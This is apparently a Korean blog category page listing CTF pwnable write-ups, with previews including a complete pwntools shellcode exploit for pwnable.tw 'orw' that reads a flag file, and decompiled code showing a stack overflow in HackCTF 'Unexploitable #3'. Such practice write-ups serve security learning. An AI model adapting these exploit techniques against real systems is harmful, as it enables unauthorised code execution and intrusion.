Pwnable(35)
-
dreamhack.io - tcache_dup2
보호되어 있는 글입니다.
2021.09.03 -
dreamhack.io - cpp_string
보호되어 있는 글입니다.
2021.09.01 -
pwnable.tw - orw
쉘코딩 하면 덴다. from pwn import * r = remote("chall.pwnable.tw", 10001) e = ELF("orw") context.log_level = "debug" context(arch='i386', os='linux') pay = "" pay += asm(shellcraft.open('/home/orw/flag')) pay += asm(shellcraft.read('eax', e.bss()+0x100, 100)) pay += asm(shellcraft.write(1, e.bss()+0x100, 100)) r.recv() r.sendline(pay) r.interactive()
2021.08.31 -
dreamhack.io - cpp_type_confusion
보호되어 있는 글입니다.
2021.08.25 -
dreamhack.io - cpp_container_1
보호되어 있는 글입니다.
2021.08.12 -
HackCTF - Unexploitable #3
아마 stack 마지막 문제 같다. 후딱 풀어서 ALLCLEAR해야겠다. 코드를 보면 위와 아래와 같다. int __cdecl main(int argc, const char **argv, const char **envp) { char s[16]; // [rsp+0h] [rbp-10h] BYREF setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); fwrite("Impossible RTL ha? Nothing for you!\n", 1uLL, 36uLL, stdout); fgets(s, 256, stdin); return 0; } RTC기법을 이용해서 csu를 참고해야한다. 해당 ELF의 CSU구조는 아래와 같다. .text:00000000004006E..
2021.08.10